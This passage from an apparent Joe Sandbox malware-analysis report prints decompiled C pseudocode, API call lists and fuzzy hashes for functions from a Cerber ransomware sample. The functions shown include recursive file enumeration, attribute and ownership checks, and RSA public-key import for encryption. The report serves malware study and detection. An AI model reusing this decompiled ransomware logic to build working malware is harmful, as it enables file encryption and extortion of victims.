					_t16 = 1;
				}
				return _t16;
			}

0x007b9339
0x007b933b
0x007b9343
0x007b9365
0x007b936e
0x007b936e
0x007b9373

APIs

gethostbyname.WS2_32(007B93FF), ref: 007B933B
wsprintfA.USER32 ref: 007B9365

Strings

%u.%u.%u.%u, xrefs: 007B935D

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: gethostbynamewsprintf
String ID: %u.%u.%u.%u
API String ID: 3411498959-1542503432
Opcode ID: 81e023954521e5d578191886b380053db8d233a4a8d031a8447577a18098bf2d
Instruction ID: 49c62ddc140c87b2c292e9bf63d484760d1b1d40cdff6fd5bf74ebff44bc0723
Opcode Fuzzy Hash: 81e023954521e5d578191886b380053db8d233a4a8d031a8447577a18098bf2d
Instruction Fuzzy Hash: F7E02BB12040A02F83190B59DC18D72BFECEF0D3523098295FA85CB172D129DA20DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 007B7E69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B7E69(WCHAR* _a4) {
				void* _t4;

				_t4 = 0;
				if(PathCombineW(_a4, L"C:\\Windows\\", L"cscc.dat") != 0) {
					_t4 = 1;
				}
				return _t4;
			}

0x007b7e7a
0x007b7e84
0x007b7e86
0x007b7e86
0x007b7e8b

APIs

PathCombineW.SHLWAPI(?,C:\Windows\,cscc.dat,00000000,?,007B7EA6,?), ref: 007B7E7C

Strings

C:\Windows\, xrefs: 007B7E72
cscc.dat, xrefs: 007B7E6D

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: CombinePath
String ID: C:\Windows\$cscc.dat
API String ID: 3422762182-1946977352
Opcode ID: ab62c296b2e047b319aa1bd830b07a93f15b4a244653c7c2b68a96bb846ce6fc
Instruction ID: b89932fec94a5860eb142da5e6207b3c571b4e0aa5da3042cca8eb967e8e3d6d
Opcode Fuzzy Hash: ab62c296b2e047b319aa1bd830b07a93f15b4a244653c7c2b68a96bb846ce6fc
Instruction Fuzzy Hash: DBC012B1380268A3451116A95C09F9AFB9CEB19BA23048129B904D1040D69DCC1082D4

Uniqueness

Uniqueness Score: -1.00%

Function 007B682F Relevance: 5.0, APIs: 4, Instructions: 31
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B682F(void** _a4) {
				void* _t3;
				void* _t4;
				void** _t7;
				void* _t8;

				_t7 = _a4;
				if(_t7 != 0) {
					_t4 =  *_t7;
					if(_t4 != 0) {
						_t4 = HeapFree(GetProcessHeap(), 0, _t4);
					}
					_t8 = _t7[1];
					if(_t8 != 0) {
						_t4 = HeapFree(GetProcessHeap(), 0, _t8);
					}
					return _t4;
				}
				return _t3;
			}

0x007b6833
0x007b6838
0x007b683a
0x007b684c
0x007b6854
0x007b6854
0x007b6856
0x007b685b
0x007b6863
0x007b6863
0x00000000
0x007b6866
0x007b6869

APIs

GetProcessHeap.KERNEL32(00000000), ref: 007B6851
HeapFree.KERNEL32(00000000), ref: 007B6854
GetProcessHeap.KERNEL32(00000000,?), ref: 007B6860
HeapFree.KERNEL32(00000000), ref: 007B6863

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 598802b17712c7de3fcb7604fc5c33a11544a4b0b2c72b2bc6f799e705067443
Instruction ID: 8d5fbdfd34a30913b6ede5f6503bcdd52c099f20cd1e91b81cb347d7b2a884bd
Opcode Fuzzy Hash: 598802b17712c7de3fcb7604fc5c33a11544a4b0b2c72b2bc6f799e705067443
Instruction Fuzzy Hash: 78E0127270035967DA209ED69CC4F97B79CEB94755F044036E704D7140D568EC008AB5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Endermanch@Cerber5.exePID: 5148, Parent PID: 3220COMMON

Executed Functions

Function 0040A419 Relevance: 28.7, APIs: 19, Instructions: 192
stringfilesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E0040A419(void* __ecx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, char* _a16) {
				long _v8;
				void* _v12;
				int _v16;
				struct _WIN32_FIND_DATAW _v612;
				short _v1132;
				struct _SECURITY_DESCRIPTOR _v2156;
				void* __ebx;
				void* __esi;
				signed int _t51;
				void* _t54;
				int _t55;
				int _t63;
				intOrPtr _t68;
				WCHAR* _t70;
				WCHAR* _t72;
				int _t86;
				signed int _t88;
				intOrPtr _t105;
				char* _t106;
				void* _t107;
				int _t108;
				void* _t109;
				void* _t110;

				_t105 = _a4;
				if(_t105 == 0) {
					_t51 = GetFileAttributesW(_a8); // executed
					SetFileAttributesW(_a8, _t51 | 0x00002000); // executed
					_t54 = E0040591C( &E0040D8B0, 1, 0x126191fd);
					_t110 = _t109 + 0xc;
					_t55 = E00406390(_t54,  &_v1132, _a8);
					_pop(_t102);
					__eflags = _t55;
					if(_t55 != 0) {
						goto L8;
					}
				} else {
					_t55 = E00409381(__ecx, _t105, 0);
					_t108 = _t55;
					if(_t108 != 0) {
						_push(_a8);
						_push(_t108);
						wsprintfW( &_v1132, E0040591C(0x40d7dc, 5, 0x3260f07e));
						_t110 = _t109 + 0x1c;
						E00405463(_t108);
						_t55 = GetFileAttributesW( &_v1132); // executed
						if((_t55 & 0x00000002) == 0) {
							_t102 =  &_v8;
							_v8 = 0x400;
							_t86 = GetFileSecurityW( &_v1132, 1,  &_v2156, 0x400,  &_v8); // executed
							if(_t86 == 0 || GetSecurityDescriptorOwner( &_v2156,  &_v12,  &_v16) == 0) {
								L6:
								 *((char*)(_t105 + 5)) = 1;
								_t88 = GetFileAttributesW( &_v1132); // executed
								SetFileAttributesW( &_v1132, _t88 | 0x00002000); // executed
								lstrcatW( &_v1132, 0x40cec8);
								L8:
								_t106 = _a16;
								if( *((char*)(_t106 + 1)) != 0) {
									L10:
									_t55 = FindFirstFileW( &_v1132,  &_v612); // executed
									_v8 = _t55;
									if(_t55 != 0xffffffff) {
										_t107 = 0;
										while(WaitForSingleObject( *0x42f834, 0) != 0) {
											if(E004063BC( &(_v612.cFileName)) != 0 || (_v612.dwFileAttributes & 0x00000400) != 0) {
												L25:
												_t63 = FindNextFileW(_v8,  &_v612); // executed
												if(_t63 != 0) {
													continue;
												}
												break;
											} else {
												if(_t107 != 0) {
													L17:
													CharLowerBuffW( &(_v612.cFileName), lstrlenW( &(_v612.cFileName)));
													if((_v612.dwFileAttributes & 0x00000010) == 0) {
														_t68 = _v612.nFileSizeHigh;
														_t102 = _v612.nFileSizeLow;
														__eflags = _t68 -  *0x42f7ac; // 0x0
														if(__eflags < 0) {
															goto L25;
														}
														if(__eflags > 0) {
															L22:
															__eflags =  *_t106;
															if( *_t106 == 0) {
																L24:
																_t70 = _a12(_t107,  &_v612, _t106);
																_t110 = _t110 + 0xc;
																__eflags = _t70;
																if(_t70 == 0) {
																	break;
																}
																goto L25;
															}
															_t72 = StrChrW( &(_v612.cFileName), 0x2e);
															__eflags = _t72;
															if(_t72 == 0) {
																goto L25;
															}
															goto L24;
														}
														__eflags = _t102 -  *0x42f7a8; // 0x800
														if(__eflags < 0) {
															goto L25;
														}
														goto L22;
													}
													Sleep(1); // executed
													E0040A419(_t102, _t107,  &(_v612.cFileName), _a12, _t106); // executed
													_t110 = _t110 + 0x10;
													goto L25;
												}
												_t107 = E0040A25A(lstrlenW(_a8), _t102, _a4, _a8, _t106);
												_t110 = _t110 + 0xc;
												if(_t107 == 0) {
													break;
												}
												goto L17;
											}
										}
										return FindClose(_v8);
									}
								} else {
									_t55 = E004094DB( &_v1132);
									_pop(_t102);
									if(_t55 == 0) {
										goto L10;
									}
								}
							} else {
								_t55 = EqualSid(0x42fa80, _v12);
								if(_t55 == 0) {
									goto L6;
								}
							}
						}
					}
				}
				return _t55;
			}

0x0040a425
0x0040a42a
0x0040a518
0x0040a527
0x0040a539
0x0040a53e
0x0040a54b
0x0040a551
0x0040a552
0x0040a554
0x00000000
0x00000000
0x0040a430
0x0040a433
0x0040a438
0x0040a43e
0x0040a444
0x0040a447
0x0040a464
0x0040a46a
0x0040a46d
0x0040a479
0x0040a481
0x0040a487
0x0040a491
0x0040a4a4
0x0040a4ac
0x0040a4dd
0x0040a4e4
0x0040a4e8
0x0040a4fb
0x0040a50d
0x0040a55a
0x0040a55a
0x0040a561
0x0040a578
0x0040a586
0x0040a58c
0x0040a592
0x0040a598
0x0040a59a
0x0040a5bd
0x0040a686
0x0040a690
0x0040a698
0x00000000
0x00000000
0x00000000
0x0040a5d3
0x0040a5d5
0x0040a5fb
0x0040a610
0x0040a61d
0x0040a63d
0x0040a643
0x0040a649
0x0040a64f
0x00000000
0x00000000
0x0040a651
0x0040a65b
0x0040a65b
0x0040a65e
0x0040a673
0x0040a67c
0x0040a67f
0x0040a682
0x0040a684
0x00000000
0x00000000
0x00000000
0x0040a684
0x0040a669
0x0040a66f
0x0040a671
0x00000000
0x00000000
0x00000000
0x0040a671
0x0040a653
0x0040a659
0x00000000
0x00000000
0x00000000
0x0040a659
0x0040a621
0x0040a633
0x0040a638
0x00000000
0x0040a638
0x0040a5ee
0x0040a5f0
0x0040a5f5
0x00000000
0x00000000
0x00000000
0x0040a5f5
0x0040a5bd
0x00000000
0x0040a6a1
0x0040a563
0x0040a56a
0x0040a56f
0x0040a572
0x00000000
0x00000000
0x0040a572
0x0040a4c7
0x0040a4cf
0x0040a4d7
0x00000000
0x00000000
0x0040a4d7
0x0040a4ac
0x0040a481
0x0040a43e
0x0040a6ab

APIs

wsprintfW.USER32 ref: 0040A464

Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
Part of subcall function 00405463: RtlFreeHeap.NTDLL(00000000,-00000008), ref: 0040549A
Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1

GetFileAttributesW.KERNEL32(?), ref: 0040A479
GetFileSecurityW.KERNELBASE(?,00000001,?,00000400,?), ref: 0040A4A4
GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 0040A4BD
EqualSid.ADVAPI32(0042FA80,?), ref: 0040A4CF
GetFileAttributesW.KERNEL32(?), ref: 0040A4E8
SetFileAttributesW.KERNEL32(?,00000000), ref: 0040A4FB
lstrcatW.KERNEL32(?,0040CEC8), ref: 0040A50D
GetFileAttributesW.KERNEL32(?,?,0040A367,00000000), ref: 0040A518
SetFileAttributesW.KERNEL32(?,00000000), ref: 0040A527
FindFirstFileW.KERNEL32(?,?), ref: 0040A586
WaitForSingleObject.KERNEL32(00000000), ref: 0040A5A2
lstrlenW.KERNEL32(?,0040A367), ref: 0040A5DB
lstrlenW.KERNEL32(?), ref: 0040A602
CharLowerBuffW.USER32(?,00000000), ref: 0040A610
Sleep.KERNEL32(00000001), ref: 0040A621
StrChrW.SHLWAPI(?,0000002E), ref: 0040A669
FindNextFileW.KERNEL32(?,?), ref: 0040A690
FindClose.KERNEL32(?), ref: 0040A6A1

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: File$Attributes$Find$ErrorLastSecuritylstrlen$BuffCharCloseDescriptorEqualFirstFreeHeapLowerNextObjectOwnerSingleSleepWaitlstrcatwsprintf
String ID:
API String ID: 3254900428-0
Opcode ID: 95870538ed6e8c4d8f518e8b1f60f6a5127569b72ba2bff67243cf3724bafaf0
Instruction ID: 6187f46a005a6f47ffa6dfcf539702b581d4e88321e0c337fcbf86212e5dcf34
Opcode Fuzzy Hash: 95870538ed6e8c4d8f518e8b1f60f6a5127569b72ba2bff67243cf3724bafaf0
Instruction Fuzzy Hash: F9618275900219ABDB209BA0DD49FDB777CBF04310F0445BAF909F2190EB3A9A65CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00409857 Relevance: 18.1, APIs: 12, Instructions: 122
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E00409857(void* __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct _SHFILEINFOW _v708;
				short _v1222;
				short _v1228;
				char _v1748;
				struct _WIN32_FIND_DATAW _v2340;
				char _v2860;
				short _v3380;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t34;
				intOrPtr _t42;
				void* _t51;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t73;
				void* _t75;
				void* _t77;
				void* _t79;

				_t79 = __eflags;
				_t67 = __ecx;
				 *0x40eb10(0); // executed
				GetSystemDirectoryW( &_v1228, 0x104);
				_t74 = 0x2b4;
				SHGetFileInfoW( &_v1228, 0,  &_v708, 0x2b4, 0x400); // executed
				_t34 = E0040AF39(_t67, lstrlenW( &(_v708.szTypeName)) + _t32);
				_pop(_t68);
				_v8 = _t34;
				_v1222 = 0;
				SHGetFileInfoW( &_v1228, 0,  &_v708, 0x2b4, 0x400); // executed
				_t42 = E0040AF39(_t68, lstrlenW( &(_v708.szTypeName)) + _t40);
				_pop(_t69);
				_v12 = _t42;
				 *0x40e798(0, 8, 0, 0,  &_v1748); // executed
				_push( &_v1748);
				_push(E0040591C(0x40d7f4, 8, 0x9d46391f));
				_push( &_v3380);
				E00405A8E(0, 0x400, 0x2b4, _t79);
				_t77 = _t75 + 0x18;
				_t51 = FindFirstFileW( &_v3380,  &_v2340); // executed
				_t73 = _t51;
				_t80 = _t73 - 0xffffffff;
				if(_t73 != 0xffffffff) {
					do {
						_push( &(_v2340.cFileName));
						_push( &_v1748);
						_push(E0040591C(0x40ced4, 5, 0x7f642c43));
						_push( &_v2860);
						E00405A8E(0, _t73, _t74, _t80);
						_push(_v12);
						_push(_v8);
						_push( &_v2860);
						_t74 = E0040972C(0, _t73, _t74, _t80);
						_t77 = _t77 + 0x28;
						_t81 = _t74;
						if(_t74 != 0) {
							CharLowerBuffW(_t74, lstrlenW(_t74));
							E004096CC(_t69, _t81, _t74);
							_pop(_t69);
							E00405463(_t74);
						}
					} while (FindNextFileW(_t73,  &_v2340) != 0);
					return FindClose(_t73);
				}
				return _t51;
			}

0x00409857
0x00409857
0x00409866
0x00409878
0x00409884
0x00409899
0x004098b5
0x004098ba
0x004098bb
0x004098c1
0x004098d8
0x004098f4
0x004098f9
0x004098fa
0x00409909
0x00409915
0x0040992a
0x00409931
0x00409932
0x00409937
0x00409948
0x0040994e
0x00409950
0x00409953
0x00409955
0x0040995b
0x00409962
0x00409977
0x0040997e
0x0040997f
0x00409984
0x0040998d
0x00409990
0x00409996
0x00409998
0x0040999b
0x0040999d
0x004099a8
0x004099af
0x004099b4
0x004099b5
0x004099b5
0x004099c8
0x00000000
0x004099cd
0x004099d7

APIs

CoInitialize.OLE32(00000000), ref: 00409866
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00409878
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000400), ref: 00409899
lstrlenW.KERNEL32(?), ref: 004098A6
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000400), ref: 004098D8
lstrlenW.KERNEL32(?), ref: 004098E5
SHGetFolderPathW.SHELL32(00000000,00000008,00000000,00000000,?), ref: 00409909
FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00409948

Part of subcall function 0040972C: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000408), ref: 004097E1
Part of subcall function 0040972C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004097EE
Part of subcall function 0040972C: PathFindExtensionW.SHLWAPI(?,?,?,?,?,?,?,?,?,?), ref: 00409814

lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 004099A0
CharLowerBuffW.USER32(00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004099A8

Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
Part of subcall function 00405463: RtlFreeHeap.NTDLL(00000000,-00000008), ref: 0040549A
Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1

FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004099C2
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 004099CD

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: File$Findlstrlen$Info$ErrorLastPath$BuffCharCloseDirectoryExtensionFirstFolderFreeHeapInitializeLowerNextSystem
String ID:
API String ID: 2493930338-0
Opcode ID: 4554cd949ba8cf5e398bad19e7416b0ecb408134c179bc66daf30f81b9ed2ce3
Instruction ID: 98bb2fb97e339870cc37db1ad270d3e311652f1936ccaf0b3fdcbc75b29e6f69
Opcode Fuzzy Hash: 4554cd949ba8cf5e398bad19e7416b0ecb408134c179bc66daf30f81b9ed2ce3
Instruction Fuzzy Hash: 8D4121B2901118ABDB10ABA0DD89EEF777CEB45314F0405B7B605F2051E6349F488F69

Uniqueness

Uniqueness Score: -1.00%

Function 0040B17E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E0040B17E(char _a4) {
				void* _v8;
				char _v12;
				char _v16;
				void* _v20;
				void* __edi;
				void* __esi;
				void* _t14;
				void* _t16;
				void* _t27;
				void* _t39;

				_v16 = 0;
				_t14 = E0040B11B();
				_t44 = _t14;
				if(_t14 != 0) {
					_t16 = E00405905(0x40d944, 0x11, 0xd0371e50);
					_t2 =  &_a4; // 0x4029e6
					_t36 = E00401127(0, E004032B8(E004031AF( *_t2, _t44, _t16), _t44));
					if(_t21 != 0) {
						_t3 =  &_v12; // 0x4029e6
						_v12 = 0;
						_t39 = E00401127(_t3, _t36);
						if(_t39 != 0) {
							_t7 =  &_v12; // 0x4029e6
							_v8 = 0;
							_v20 = 0;
							_t27 =  *0x40f918(0x10001, 8, _t39,  *_t7, 0x8000, 0,  &_v8,  &_v20); // executed
							if(_t27 != 0) {
								 *0x40f804( *0x42faf8, 1, _v8,  &_v16); // executed
								LocalFree(_v8);
							}
							E00405463(_t39);
						}
						E00405463(_t36);
					}
				}
				return _v16;
			}

0x0040b187
0x0040b18a
0x0040b18f
0x0040b191
0x0040b1a4
0x0040b1aa
0x0040b1c1
0x0040b1c8
0x0040b1cc
0x0040b1cf
0x0040b1d7
0x0040b1dc
0x0040b1ec
0x0040b1ef
0x0040b1fa
0x0040b1fd
0x0040b205
0x0040b216
0x0040b21f
0x0040b21f
0x0040b225
0x0040b225
0x0040b22c
0x0040b231
0x0040b232
0x0040b238

APIs

Part of subcall function 0040B11B: CryptAcquireContextW.ADVAPI32(0042FAF8,00000000,00000000,00000001,F0000000,0040B260,004029D6,?,00402726,00000000,004029D6,80C426C8,?,00000000), ref: 0040B134

CryptDecodeObjectEx.CRYPT32(00010001,00000008,00000000,)@,00008000,00000000,?,?), ref: 0040B1FD
CryptImportPublicKeyInfo.CRYPT32(00000001,?,?), ref: 0040B216
LocalFree.KERNEL32(?,?,?,?,80C426C8,?,?,?,004029E6,?,00000000,00000000), ref: 0040B21F

Strings

)@, xrefs: 0040B1CC, 0040B1EC
)@, xrefs: 0040B1AA

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Crypt$AcquireContextDecodeFreeImportInfoLocalObjectPublic
String ID: )@$)@
API String ID: 1445165286-924509997
Opcode ID: cd229777a01e81c430f156ce5ec166d499d460593341b2e080af31e16312a2a1
Instruction ID: ff3408afee1e7cb94f08fa9440ee7e9cb1970d792c828288a7f0ea7b6b935642
Opcode Fuzzy Hash: cd229777a01e81c430f156ce5ec166d499d460593341b2e080af31e16312a2a1
Instruction Fuzzy Hash: F0119372900208BBCB10EFA5DC85FDF7B78EB44754F0444BAF500B7191D7799A448B98

Uniqueness

Uniqueness Score: -1.00%

Function 00401423 Relevance: 6.1, APIs: 4, Instructions: 129
filestringCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00401423(void* __edx, intOrPtr _a4, WCHAR* _a8) {
				char _v8;
				char _v20;
				struct _WIN32_FIND_DATAW _v612;
				short _v1132;
				char _v1652;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short* _t29;
				int _t32;
				WCHAR* _t38;
				int _t44;
				void* _t49;
				int _t54;
				void* _t60;
				void* _t63;
				void* _t65;
				void* _t69;
				WCHAR* _t70;
				void* _t73;

				_t69 = __edx;
				_t70 = _a8;
				_t3 = lstrlenW(_t70) * 2; // 0x401634
				_t29 = _t70 + _t3 - 2;
				if( *_t29 == 0x5c) {
					 *_t29 = 0;
				}
				_t32 = E00406390(0x40cec8,  &_v1132, _t70);
				_pop(_t65);
				if(_t32 == 0) {
					L14:
					return _t32;
				}
				_t32 = FindFirstFileW( &_v1132,  &_v612); // executed
				_t63 = _t32;
				if(_t63 == 0xffffffff) {
					goto L14;
				} else {
					goto L4;
				}
				do {
					L4:
					if(E004063BC( &(_v612.cFileName)) == 0) {
						if((_v612.dwFileAttributes & 0x00000010) == 0) {
							_t38 = E0040591C(0x40cecc, 5, 0x25f360d5);
							_t73 = _t73 + 0xc;
							__eflags = PathMatchSpecW( &(_v612.cFileName), _t38);
							if(__eflags != 0) {
								_push( &(_v612.cFileName));
								_push(_t70);
								_push(E0040591C(0x40ced4, 5, 0x7f642c43));
								_push( &_a8);
								_t44 = E00405B0C(_t63, _t65, _t70, _t71, __eflags);
								_t73 = _t73 + 0x1c;
								__eflags = _t44;
								if(_t44 != 0) {
									_push( &(_v612.cFileName));
									_push(E0040591C(0x40cedc, 0xd, 0x674a9bfe));
									_push(_a4);
									E00402B9B(_t63, _t69, _t70, _t71);
									_push( &_v20);
									_t49 = 0xb;
									E00405DFA(_t49, _t65, _t69);
									_pop(_t65);
									_push(_a8);
									_push( &_v20);
									_push(E00405905(0x40ceec, 0x3d, 0xa229e8b6));
									_push( &_v8);
									_t54 = E00405B59(_t63, _t65, _t70, _t71, __eflags);
									_t73 = _t73 + 0x34;
									__eflags = _t54;
									if(__eflags != 0) {
										E0040137F(_t63, _t65, _t70, __eflags, _v8);
										_pop(_t65);
										E00405463(_v8);
									}
									_t71 = _a8;
									E00405463(_a8);
								}
							}
						} else {
							_t60 = E00406390( &(_v612.cFileName),  &_v1652, _t70);
							_pop(_t65);
							if(_t60 != 0) {
								E00401423(_t69, _a4,  &_v1652);
								_pop(_t65);
							}
						}
					}
					_t32 = FindNextFileW(_t63,  &_v612);
				} while (_t32 != 0);
				goto L14;
			}

0x00401423
0x0040142f
0x00401439
0x00401439
0x00401441
0x00401445
0x00401445
0x00401455
0x0040145b
0x0040145e
0x004015ba
0x004015ba
0x004015ba
0x00401472
0x00401478
0x0040147d
0x00000000
0x00000000
0x00000000
0x00000000
0x00401483
0x00401483
0x00401490
0x0040149d
0x004014de
0x004014e3
0x004014f4
0x004014f6
0x00401502
0x00401503
0x00401518
0x0040151c
0x0040151d
0x00401522
0x00401525
0x00401527
0x0040152f
0x00401544
0x00401545
0x00401548
0x00401553
0x00401556
0x00401557
0x0040155c
0x0040155d
0x00401563
0x00401578
0x0040157c
0x0040157d
0x00401582
0x00401585
0x00401587
0x0040158d
0x00401592
0x00401593
0x00401593
0x00401598
0x0040159b
0x0040159b
0x00401527
0x0040149f
0x004014ad
0x004014b3
0x004014b6
0x004014c6
0x004014cc
0x004014cc
0x004014b6
0x0040149d
0x004015a8
0x004015ae
0x00000000

APIs

lstrlenW.KERNEL32(00401636,0040183A,00000000,00000000), ref: 00401433
FindFirstFileW.KERNEL32(?,?), ref: 00401472
PathMatchSpecW.SHLWAPI(?,00000000), ref: 004014EE

Part of subcall function 0040137F: memset.NTDLL ref: 004013B8
Part of subcall function 0040137F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004013DD
Part of subcall function 0040137F: WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,00000000), ref: 004013EF
Part of subcall function 0040137F: TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00401400
Part of subcall function 0040137F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401409
Part of subcall function 0040137F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401412

Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
Part of subcall function 00405463: RtlFreeHeap.NTDLL(00000000,-00000008), ref: 0040549A
Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1

FindNextFileW.KERNEL32(00000000,?), ref: 004015A8

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CloseErrorFileFindHandleLastProcess$CreateFirstFreeHeapMatchNextObjectPathSingleSpecTerminateWaitlstrlenmemset
String ID:
API String ID: 3597093630-0
Opcode ID: 5d56be7d600ee7cc226b40cadb0352b37b8e8447c406b97f4544eebc66979ee5
Instruction ID: 3cbd6c154ce3158a442487cf6f0ac316fb6bcfd1db9ef5865afd0173552f36fe
Opcode Fuzzy Hash: 5d56be7d600ee7cc226b40cadb0352b37b8e8447c406b97f4544eebc66979ee5
Instruction Fuzzy Hash: 3D418372800119BADB20AB61DC46FAB336CEF40314F5405BBF905F61D1F739AB448AA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040AAFB Relevance: 6.1, APIs: 4, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E0040AAFB(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, WCHAR* _a8) {
				WCHAR* _v8;
				union _ULARGE_INTEGER _v12;
				WCHAR* _v16;
				union _ULARGE_INTEGER _v20;
				void* _v220;
				void* _v420;
				void* _v620;
				void* __edi;
				void* __ebp;
				int _t30;
				void* _t51;

				_t51 = __edx;
				_v12.LowPart = 0;
				asm("stosd");
				_v20.LowPart = 0;
				asm("stosd");
				_t30 = GetDiskFreeSpaceExW(_a8, 0,  &_v12,  &_v20); // executed
				if(_t30 != 0 && E00402C54(_t51, _a4) != 0) {
					_push(0x64);
					StrFormatByteSizeW(_v12.LowPart, _v8,  &_v620);
					_push(0x64);
					StrFormatByteSizeW(_v20.LowPart, _v16,  &_v420);
					_push(0x64);
					asm("sbb ecx, [ebp-0xc]");
					StrFormatByteSizeW(_v12.LowPart - _v20.LowPart, _v8,  &_v220);
					_push( &_v220);
					_push( &_v420);
					_push( &_v620);
					_push(_a8);
